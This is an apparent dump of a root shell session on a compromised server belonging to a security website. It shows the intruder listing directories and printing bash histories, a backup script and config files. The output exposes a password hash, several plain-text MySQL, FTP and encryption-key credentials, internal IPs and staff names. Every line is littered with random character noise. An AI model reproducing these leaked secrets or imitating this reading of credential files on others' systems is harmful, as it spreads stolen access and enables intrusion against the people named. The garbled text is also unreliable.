astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::: T" A6 i0 ^. F8 _4 l0 P( X
3 i2 b0 t& p# Y6 v. B% Y0 e1 i' Rsh-3.2# cat /etc/motd5 K! l. c+ D6 H Y) T- p# z n3 K
#####################################################1 x# b( S9 v8 b$ Z4 E2 D
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #6 y! J& `6 w$ Z$ W E) c
# |__| [__ | |__| | |__| | | | [__ | |__| #
* J) u8 _) d& |! C/ k* e9 u# | | ___] | | | |___ | | \/ | ___] | | | #" g. A R% b5 L2 x) @
# #. W* R9 R# Q: y8 P
#####################################################1 S G& M. Y7 r; n9 C [1 l
# #
' g) K) W0 F9 t( |+ |# Admin Contact - 链接标记support@secureservertech.com #
6 |, M5 C% z+ {5 X# #1 p) `' W& A2 i) i4 {4 j
# Available ShortCuts #
* e" g- G& ^8 W# #
+ {1 L$ O, r$ r) U% w4 E; V# nst - list active connections #4 d L# Y; Y/ t
# ddos - shows how many times each ip is connected ## ^; m9 R/ Q: y6 K3 q8 H: S
# ltr - restart the webserver #
" h0 p+ f7 i% r. w5 S& o/ l# phpc - edit the php config file #! H0 g5 j( n2 i2 P
# htc - edit the webserver configuration file #
( v% N( ?7 |3 M) n+ V1 z# up - uptime #& w$ A' w& X! t7 I
# etd - edit the motd of the day file #" e* M4 Z4 s3 v$ X- m, o* G% u
# htr - start and restart apache if needed #% \; p( }% s; u" e8 T
# syng - shows active SYN_RECV connections #
6 q/ f: ~% Y% E# synd - syn flood blocker - “synd -h” for usage #. G7 S3 ?4 Z x. u
#####################################################
2 V& k# A( Z% N# NOTES: #
/ Y7 `1 }) X" V. L0 |$ O# V# Last Upgrade - 12-08-2008 by JF #
P- S0 V K9 z3 @# My.cnf/Mysql Optimization - 1-28-09 #) p5 x2 ^6 k0 g8 x
# #/ \# s( P8 G' j0 x
# # B; q+ n/ X- x# w8 d
# # ^$ _& S2 N+ F3 x9 \
#####################################################. u. J y+ ~9 P; E9 s; C2 [
' @/ @! i* z4 z* C% C
sh-3.2# lastlog | grep -v Never
! X( h; s1 m0 @: p+ `9 t/ d1 q5 jUsername Port From Latest
, V9 m @ q$ c6 _" Xroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009& k# Q5 O( M. y V
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
( z7 w3 o$ {; s! U0 ycom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 20095 j4 }5 p2 j( X! Z l1 e
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
! I. ?, x7 P: l; ~- g: Z" @4 I! k0 ~- a+ `# z! Y' Q
sh-3.2# ls -la: e3 H& J' q9 G% g9 Q& G7 A. R1 p
total 453376: W4 F$ D2 U4 [& |- j5 s
drwxr-x— 15 root root 4096 Jun 4 08:40 .
/ Q& n6 v; {6 g% ~ z0 F/ }drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
/ o* H) i: z2 X1 h. i( m-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
2 |2 u N* g) h. r-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg y! Y* {* m; g0 ~
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
/ {! e f, j9 ]% r) n2 a2 a-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
+ d3 x8 a/ X' ^; _. F: T-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile1 `6 C- Q, u; j8 A- L
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc+ L% E# p0 T; a& U3 n# D; g; D0 z
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh( h! V1 G: W- a6 ?6 i( f1 E: W
-rw-r–r– 1 root root 1327 Nov 29 2007 cert/ J. M! w* `! S2 q g* l: e
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
8 e6 Q" m! Z* o0 {8 F Pdrwxr-xr-x 4 root root 4096 May 20 2008 .cpan
5 R9 J! {; }$ A& O, U-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc2 k% ^! A6 V7 M
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql1 D) g6 ]' J4 j
drwx—— 2 root root 4096 Oct 28 2007 .elinks5 K4 ?4 M) n4 X% q, n2 A5 D5 O) `
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
" C) H0 l. E/ l6 C5 q7 h0 @-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2+ i/ j- a# s; M& `8 p
-rw——- 1 root root 0 Apr 16 13:19 .history! a" U& J$ `9 w9 p+ ?
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log1 R! V' ^) L$ }+ v3 [7 H
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
0 `+ _4 m9 T5 G7 y, p. Q0 B2 q-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
; ^* F: _) u _- V q-rw——- 1 root root 35 Jun 2 14:23 .lesshst, M# j' B" n9 h% E. s6 ~
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp* h/ v6 Q l; V4 M/ U, w1 s K
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec) _4 x: ^- |0 ?8 |! ]8 \9 B8 H# T, T
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz7 j" B$ `. Q2 ?! Z8 T* o
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
2 s1 z. {9 u* O- \) `-rwx—— 1 root root 760 Sep 18 2008 lp
# N9 |! o' S S# cdrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.11 M# y, r5 t6 }6 ]0 T+ Q4 D/ F
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
0 |- H" b4 f3 Z# f0 J1 N-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1% E- U4 o- @: V# v$ e- l: s
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
$ V5 \7 w% i+ I* v-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
- `- r+ B) d1 q' ^drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
: G1 Z% c! O/ O1 L. ~8 y-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz, p4 P1 n( l- e5 e+ r+ n- ]
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
5 W2 D0 ]+ H8 J9 w-rw——- 1 root root 41 Oct 19 2007 .my.cnf5 C+ ?* F4 ^# m2 C5 y
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history7 y" [! P. I9 v$ }4 k _" J
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport6 ~" ?0 |$ w# ^/ g( D7 q# D8 Q6 j
-rw——- 1 root root 41 May 20 2008 .mytop
2 R! X) T* K3 W1 odrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
* v8 e! z; {" ^ J# j4 F-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
( q! M6 ~- \% b3 k; ]drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp' B0 p" f5 v( x' ]% M
-rw——- 1 root root 1462 Sep 21 2007 opt.php) l% V+ p. ]: X
-rw-r–r– 1 root root 3371 Sep 22 2007 p) q) w# M1 t Y9 k3 }: e
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
5 d2 H A$ ?. ]; h7 d3 O' G-rw——- 1 root root 1024 Feb 3 21:32 .rnd# h/ y1 s p3 i1 m
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
9 x ?% z# u/ H* M* x/ ~-rw-r–r– 1 root root 887 Nov 28 2007 server.key
: \7 k: {' y( o$ c0 J8 z5 Vdrwx—— 2 root root 4096 Oct 10 2008 .ssh
2 e# s* U, ^3 b9 ^-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
; P* j! O6 x' \; ?8 M3 U% Z9 J-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc" H* e0 B) v* n3 I& D g& N
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip* S8 u: [7 i/ F
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1* E8 I- s; ]5 A* m* z
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp# J: V( t% I2 Z1 X; ~) V' N
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
% U" E( t m5 W1 {! tdrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
' i+ P3 ~1 ^/ W% s4 H-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2* v% S: R1 J' _4 D
-rw——- 1 root root 12997 May 16 2008 .viminfo, F; Z, G+ n/ m# T H( D
2 c U2 h: g, d) ~2 I8 l2 a/ Msh-3.2# cat .bash_history2 Z3 \9 S% Z6 T6 Y% h' B. T3 r+ q. B6 V
[snip]. S+ }# d" T* y% y3 J0 @8 u1 j1 N9 W
wget cp4sst.com/sstlinux.tar.gz
! [+ r @ b( o) n" g' Etar zxvf sstlinux.tar.gz" _& D) M7 B8 @& ^' k& h8 n( K
cd linux-2.6.27.10
) }& |, [ A' P7 Z( i4 o' csh install.sh( F( T" n2 M* ]+ P
make bzImage ; make modules ; make modules_install ; make install$ p7 Y/ b/ z0 X1 ?3 y7 G8 y
make clean) K9 q% F+ I) ?4 m4 z5 O+ d
service mysqld restart, I; e) A0 K+ X) k* O; e
[snip]
6 {1 \# l( a" I U, jcd /usr/sbin/
* {; w" U$ ~8 M* d7 i: Q9 Qchmod 4777 traceroute: s% l" E# n' X3 I4 z
chmod 4777 ping
/ n5 P- n' y" t! [# atraceroute -I 链接标记[url]www.astalavista.ch[/url]
' {: V, H' }) L3 T0 O8 `% S5 j& T& W[snip]
1 x( @3 A! u! @( _7 @/ d$ ]. pvi /etc/csf/csf.conf
' q5 C7 \+ p1 g" m5 E; {" h Ptraceroute google.ch
8 U0 ^* O! S* b ~service csf restart& t0 D/ e: t9 O+ r1 |
tracert google.ch; _# m% ^; T, _' k! T
service csf restart
6 w6 M5 O `/ \6 e9 b: }traceroute 链接标记[url]www.google.ch[/url]9 J+ I* l9 u" @* B' M9 N) P
tracert 链接标记[url]www.google.ch[/url]! F* M9 W( z" G4 V: V* u
traceroute 链接标记[url]www.google.ch[/url]
h; H5 {( v' }( Glocate traceroute8 ~ h! Z5 Q. K" h5 j9 x$ L+ p& H
chown 4755 /bin/traceroute
# x$ s5 p/ K6 m; O1 r0 o; D9 s$ ]chown 4777 /bin/traceroute6 T- N2 l- ]* {" ]! l
locate ping1 L: Y# g0 H. B' f" y
chown 4755 /bin/ping
8 B0 y0 A" s( M7 ]; u" Qchown 4777 /bin/ping
/ u' s1 T$ { Qcd /bin/
9 z( u9 c E8 tls -ali | grep ping
% B) Z( B7 I8 j! f, ~, M) ]1 W$ ?chown root ping. z9 u2 l" V) }! ~" ^) i. a
chmod 4755 ping- R* P; _7 s- f* z+ }
ls -ali | grep traceroute
" _8 I2 m5 j1 M; U: ichown root traceroute
8 Y; n6 `% n8 m/ |, mchmod 4755 traceroute s9 f4 O" L. c/ E
ls -ali | grep traceroute
6 q* t% _/ V( A% [3 p8 ~+ S+ ktraceroute -I 链接标记[url]www.google.ch[/url]* B+ {, Q- W6 t& {: r5 G) C
traceroute 链接标记[url]www.google.ch[/url]
& F' o' ]* O3 `whois pmsantos.ch
. r; V2 C1 C& ]& i" G$ ?[snip]
. c z0 `: p% F mmysql -h com_contrexx2_live < /root/defaultp_ports.sql
6 g+ y( Y2 q3 r5 pmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql2 n9 y3 N7 O2 Z/ i3 n1 e
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql. L' z- ~9 w9 s: \: U4 N
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
; {( e( ?% n2 h# f8 ztop* v9 {5 D7 y; M; W7 V1 I
ping ssth.ch0 v5 A* Q3 V; q1 ~+ i2 m
ping asdlkfaljgasd???ljg???lasj.ch4 e; T8 n% N$ Y5 S# U5 p* ~
ping asdlkfaljgasdlasj.ch+ c) T' u$ S; q7 b1 G. W
ping 链接标记[url]www.ssth.ch[/url]
4 b( Z! ^# |% C+ |% V4 jping ssth.ch6 W) A4 f8 c c* X1 C
nslookup 链接标记[url]www.google.ch[/url]
4 a" W3 I/ J4 r$ J$ unslookup 链接标记[url]www.ssth.ch[/url]$ e6 k$ F, ^: j/ W- G! @
man nslookup
. d+ k) v* L- Q* r' c3 lping 链接标记[url]www.google.ch[/url]7 {7 z$ [9 g' _% ]9 }4 ^1 U( |
nslookup 链接标记[url]www.google.ch[/url]* n; v# F2 T+ r+ A- @
nslookup 链接标记[url]www.google.ch[/url]% a! O: }* G1 b2 a4 T( I q
nslookup salfjasdlf.ch
# C7 _ H) P1 d9 w- h1 `6 c[snip]& R: l D& g% v% E; L+ G8 p4 }' `& u
openssl passwd -1 sadf% U6 q3 g2 T1 E) k9 t. A1 n
openssl passwd -1 5cZNHstdTy
( z% y$ X' F8 t% l3 }mysql' N1 A% h( H* P: b
mysql
2 W T5 c- y# D' l- w# }4 |8 mlocate proftp) O' q1 v' F9 L W- C
vi /etc/proftpd.passwd0 J0 T$ j0 K2 c S; X. Y0 T
service proftpd restart6 c# A m3 w5 s& p p. F y; {
locate proftpd.conf) W+ ]$ j: z! r+ M' @" c' r
vi /etc/proftpd.conf
7 {3 {4 c# h T) ?! wvi /etc/proftpd.passwd s" j( L8 ~0 O( x' Z4 l
service proftpd restart
/ j" _5 Y# y; x3 ^, j7 f) J[snip]) \. u) a$ I$ V
/bin/sh /home/com/backup_system/backup.sh$ u! Q, F. s3 ^- H- N
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin* B" G' \* O8 |0 u
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
7 d( d0 E' s) Smysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
# ^% u$ H5 B4 t r7 i- Lls -ali0 u2 P0 \7 b% O$ t+ r6 ^
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
1 S; M! y$ _8 [( h! Ymysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
6 q; C" A8 x* ~6 T5 ccrontab -l
; |( y3 P5 m. ^, u1 Icrontab -l, N& @: D8 K! R3 C1 D
php -q /home/com/public_html/modifications/cronjobs/securitynews.php2 m) z" L0 _6 e* k) W$ E- ^- J
/home/com/public_html/modifications/cronjobs/exploits.sh
( K9 _7 b7 s* g E6 @- gwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
0 ?/ z p8 J# r, N! P3 Htar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz3 d9 B8 M2 f% h9 B' a
cd lsws-4.0.3
' |9 O; x- a! [# F/ jsh install.sh
, o- W9 V, w0 ~ X' [% Huptime4 q. @8 ` [4 s I% H
hdparm -tt /dev/sda6 D0 Z( m! N' N5 s
iostat
& C# o% V1 X% m2 t+ G4 ]1 byum install iostat
9 Y) K& i5 @' |3 Z$ jiostat
' i8 X! E9 R z) b5 _whereis iostat
! P! B! u! K8 a/ A* F: P: \' p- _/ Yyjm clean all
1 F5 i# \' e: r" ?+ \yum clean all ; yum -y update
9 E0 N3 ^3 }9 e# z* L' H1 z6 \7 oiostat
@& ]2 ]2 ^) s/ A1 G8 Eyum install systat8 z$ s& f/ R, S" \+ l: f6 O8 P) D9 `
rpm -qa | grep iostat7 Y+ k8 Q1 ~6 D% u; ^$ N; d
rpm -qa | grep sysstat
' A% Q; t. R2 Irpm -qa | grep systat
2 K; d/ e7 u3 e" |! G* K5 idmesg -c2 W* D8 }0 n, D
sysctl -p' x" l7 j& l: P; K
uname -r
: u* P9 t2 D% Y/ x# x3 |cd /usr/src
" n" d8 \3 {. lwget nix101.com/kernels/sstlinux.tar.gz
% q ?1 {1 E, N7 i% yshutdown -r now! l! U6 `& ]3 W' e; P0 a: y6 B4 Y0 `
nano -w /boot/grub/grub.conf1 f. L6 T2 Y6 Q2 c" b
, h0 Z+ _8 U3 }2 m! e# d2 I7 i" Esh-3.2# cat .my.cnf0 q- m* s( h# A3 ?
[client]' M: i2 y5 J& K* G, P
user=da_admin" }: }6 ^1 Z5 L. |1 y" `
password=X9dctmRH: |+ U. ~9 q% s1 L
+ `. G) S6 T; j% X: }( b, A
sh-3.2# cat /home/com/backup_system/backup.sh
; C2 k9 P6 Z0 E4 g#!/bin/sh* k6 l2 c0 e! t
#####################################################################
( l! f! B- k0 `# #
8 i0 h: B9 Q8 W' T" f- ?. J# incremental backup for astalavista.com #$ t6 Y$ `% X. v
# #! h" x0 |; J& V5 L5 B
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #* K2 [* j( }4 c) p( z8 E
# #. e2 N7 u% C% H* {' U& e2 C
#####################################################################8 W6 [% F, d( |" w+ E( y. W* j
[snip]! l3 D& h, _6 D/ {4 O8 D* F
PROG_DIR=”/home/com/backup_system”;8 ?9 f3 b$ A4 f- A6 `% N! a
BACKUP_DIR=”/home/com/backups”;
1 T5 n- x1 n; I7 ]DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;3 c# Y4 W# }" C& G. z* U% L2 o
# ftp for synology backup server
( }: p: Z$ F [3 _* W! t% EFTP_HOST=”212.254.194.163″;
) s0 d. m/ N0 s) }: X% WFTP_PORT=”21″;
$ ~2 C+ t. \ ^7 T9 W# y9 }0 r! rFTP_USER=”astalavista.com”;
! I3 r2 o, k% Q6 i6 n5 UFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
+ \8 F, x. S X7 l# K4 W' Q: rFTP_DIR=”/astalavista.com”;
0 B3 k: w1 a9 ~, C% Z$ _ O% c# l# database$ l; k1 |% o( d+ B: T6 {2 A
DB_HOST=”localhost”;
% I8 q; E* V. z& j6 K- |) O p, mDB_USER=”contrexxuser2″;
6 a! Y8 v" F/ O4 m' gDB_PASS=”0fEYNZgXz1pKe”;
) e. ?. l$ S7 ?; ^3 S3 v3 ADB_DATABASE1=”com_contrexx2_live”;
1 [" J' I8 h, x+ A0 h7 nDB_DATABASE2=”com_contrexx2″;0 g7 I8 N& X1 ?3 ?6 R" ]
[snip]! H- E: G) h9 q0 j$ _6 S' M' I- l
ftp -in $FTP_HOST $FTP_PORT <<EOF. V9 `9 e/ n0 Y* `
quote USER $FTP_USER5 Z+ p& n! c+ ]- |
quote PASS $FTP_PASS
4 p2 W$ |; d2 S1 Xcd $FTP_DIR
/ `8 T" e0 R9 J" s6 T1 Nput $DB_FULLNAME-SQL_Dump.tar
/ F$ d0 p$ m' D' h# B- ~( Iput $BACKUP_FULLNAME-Public_HTML.tar4 T* c& M* i% e# _
close
2 r: b8 F3 O, Y+ B! Cbye3 u, s) S$ ]9 j' d
EOF! G2 y$ P f' W- ?0 Y
, _, W' ^( M, [% F" Wsh-3.2# cd /home
* F/ b# w3 ]% Nsh-3.2# ls -la& Q; O: F6 g$ _$ `: F
total 120- [' y- O' U/ n, j0 R
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ., H, X. g6 h! b6 E9 O" U5 ~
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..2 s5 d. b: f6 n0 U
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin1 i8 G# v" U& c! E
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group/ X, @' O& f% _9 |/ G+ Z
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user2 s9 B" a' g* h; o& F6 K/ g& \
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet: \) ]+ X9 \' j. u4 r
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
' N- [% ^# L3 \. F4 n3 n8 Rdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
% B1 x5 ~1 i% m" ~ M" f! Ldrwx–x–x 10 com com 4096 Apr 28 12:40 com$ R$ n* f# d7 |7 z3 l
drwxr-xr-x 2 root root 4096 May 17 2007 ftp1 P& `' z+ t! F
drwx—— 3 jon jon 4096 Sep 21 2007 jon
* E$ B4 U8 u' q' C+ _8 t( Odrwx—— 2 root root 16384 Sep 11 2007 lost+found6 c( ~* i% Z' _2 K
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
8 Z# V. ]$ p, Q2 T8 @) Mdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
8 a \3 g+ v: n& b8 u; @4 p9 Z _drwx—— 2 jon jon 4096 Sep 15 2007 test
' `7 h$ \8 u. a+ r$ b* Sdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp( Z- Z i+ s/ @" E, j; w& n' `; z7 M E# g
; T6 w5 D4 `/ g
sh-3.2# cd admin
9 b+ i+ j' T9 Dsh-3.2# ls -la
- w3 A" c2 z5 [& T: p+ qtotal 1735896) B0 ^: n/ @5 |+ A( K
drwx–x–x 9 admin admin 4096 Nov 28 2007 .& S" R [) P+ R% W
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
( p, J' f9 C( a9 w% a2 [9 U vdrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups" N7 W5 H1 {8 n. {7 I7 Z3 {/ J* Y. |
drwx—— 2 admin admin 4096 Sep 28 2007 backups
2 W1 t4 i% J+ [- p) f-rw——- 1 admin admin 860 Sep 17 2008 .bash_history% b) N; D3 |; a9 M I' g
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
7 U& L5 `, `/ ]9 s-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
3 N, V& ^6 a+ H$ t1 i; ^" c1 u-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc+ P5 r( F; u- @& t, D8 u; u' Q9 f, H
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
( R! h% U' B( ?, G6 bdrwx–x–x 6 admin admin 4096 Sep 21 2007 domains8 n$ ~( S+ n, a3 g. L: v
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap
4 P* F8 }% y4 V) u% R$ \3 {-rw-r–r– 1 root root 24 Sep 21 2007 info.php
' K5 g6 r$ G7 y) u0 z% ?drwx—— 2 admin admin 4096 Sep 21 2007 mail5 ?, Q7 B) T8 l- B; i
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr4 A7 E. V" F) ?, B7 Y% I, H) f
-rw-r–r– 1 root root 887 Nov 28 2007 server.key8 \. s! M+ j6 U( r7 X* A+ o1 Q
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
) U+ @. I1 @# e0 I; a-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
1 l4 p* s3 I8 ]0 o5 C# i) |drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
0 |5 \' n: e6 X6 l* \7 X" Z m
7 p% `2 \) g: csh-3.2# ..( c* _$ h8 h0 D) B/ ^, V2 l& I$ N
sh-3.2# cd jon
1 ^- z$ F o+ @( X$ nsh-3.2# ls -la! D( [7 c: [8 n
total 36
H5 [ L5 [3 S0 f6 ~8 O4 jdrwx—— 3 jon jon 4096 Sep 21 2007 .
& o' E: \# [, V7 V* Xdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..7 T, P" }6 j' b7 D3 I
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history [" M& l7 H# j! e+ q) t, H
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
/ ]' [- B3 o; R-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile G# S4 s# A: H# y
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
2 |+ O% U, T) d3 j# ]" A3 _. d-rw-r–r– 1 root root 24 Sep 21 2007 info.php: l. P5 F. k# O6 x' i" O( k
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html+ F6 z0 @2 |* Q, }1 V. B
5 l- D" f. M2 S/ ^
sh-3.2# cd ..1 l9 H7 S& ^1 X N1 N
sh-3.2# cd test
" t& R1 I- `$ b# Fsh-3.2# ls -la
: a' j& ?: @8 a8 Ktotal 48
) e: p4 p0 i7 S% x4 n% y8 | o6 \drwx—— 2 jon jon 4096 Sep 15 2007 .
R" r) S! ^! d ?: `drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..# B( V t# f1 Z- N0 R
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history3 ~. y8 s X5 \* @/ |' e& g
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
7 s! a) r: l2 }) U1 j: ?-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
9 s" T5 B9 _! v4 M( r-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc8 P0 F% F! A5 L1 O* K
sh-3.2# cat .bash_history' j& h8 I/ j N% Y! L2 P
/usr/bin/mysqladmin -u root password PoliuJhytg67
4 R6 c2 B. L6 U9 C" a5 l/ v- \ \: k) l. b' G0 F
sh-3.2# cd ..5 D% p- c, U* q1 [ t3 \% ~) w3 o
sh-3.2# cd astanet, R5 q5 i. g& D) S* A
sh-3.2# ls -la
/ s- q; s {8 `; `2 [+ ~' Ftotal 52
: y. ]$ V' o |% ~drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
. D' N& ^0 }2 x h( g' D udrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
/ _: B2 Q7 a. n) [5 ]0 |( t3 Hdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth+ ?0 D" a( S7 l" j) m# u
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
1 g+ `5 y/ q% w# w8 t' t" _-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout& j, Z6 c' ~3 b
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
+ ^; K( d( J( J; `: E-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
+ c; k; h Y4 w% Bdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
) i' O* i% N2 ~# P& M( c5 l2 P( I2 tdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap% b" @8 z1 ~- c: Q! f7 y
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail. d6 n, c6 v; C
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
4 I3 c2 R* M) |lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
3 r( I# F* V5 r& Y9 R-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
8 J( n+ ~. n, e: v. S8 N- a+ @# f, ~9 J) H- O# B" {: \( N. Z7 t- R
sh-3.2# cd auth/
* c) t2 ` A3 m. X! fsh-3.2# ls -la
) O7 y; v M: ]7 {' ctotal 28! x$ H/ Q3 Q5 {1 `+ u
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .# ~4 e& s/ F/ ^ D1 B/ W# n
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..; a6 R0 G$ S% E% e- T! r" h: ^
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
; W, c! X* k6 w1 L( l-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
8 B+ |% {4 E9 c-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd$ W% r; j' w& @. w$ q
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting" n7 k. Z" `5 `
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd& @1 C7 ]& l, s& I
; ]" i- k8 E/ P, ?/ s" r
sh-3.2# cat hackercontest.config.inc.php/ U. B( a N* \
<?PHP# D4 X) h9 }& \, A
// Variabeln f?r Verbindung zur Datenbank //2 m& y0 }: [- M: [
$conxHost = ‘localhost’; // MySQL hostname6 r# K. C u2 `. k3 C' W
$conxUser = ‘hackercontest’; // MySQL user
2 Z2 t. B8 D! _$ h6 ?$conxPassword = ‘K6m@7dUc’; // MySQL password% {( I% _: v0 V( v0 R% t
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
& l7 K* _* W8 {. [?>
' |; L; z) `/ Y8 c; Q- z& Xsh-3.2# cat hosting.config.inc.php
: ?1 W! c; H# j. U- @<?PHP
, H( s$ d. g8 M" F# s// Variabeln f?r Verbindung zur Datenbank //
+ Z) `( u' ]* S5 Z$conxHost = ‘localhost’; // MySQL hostname9 f; b7 b. c* \$ A* j. s! T, }
$conxUser = ‘hostinguser’; // MySQL user
( u2 Y F2 K' E+ l7 R/ x' I7 x$conxPassword = ‘cXvB3981′; // MySQL password1 E, g: ? @9 [, t% e
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish" y9 }) E( U- g4 s [
?>& ~% q f+ N) F) o3 b/ B% D
6 U* y, U8 v" E- Q. L) m! q( A, Hsh-3.2# cd ..
( Z3 v& G( P" ]7 H8 H1 esh-3.2# cd com
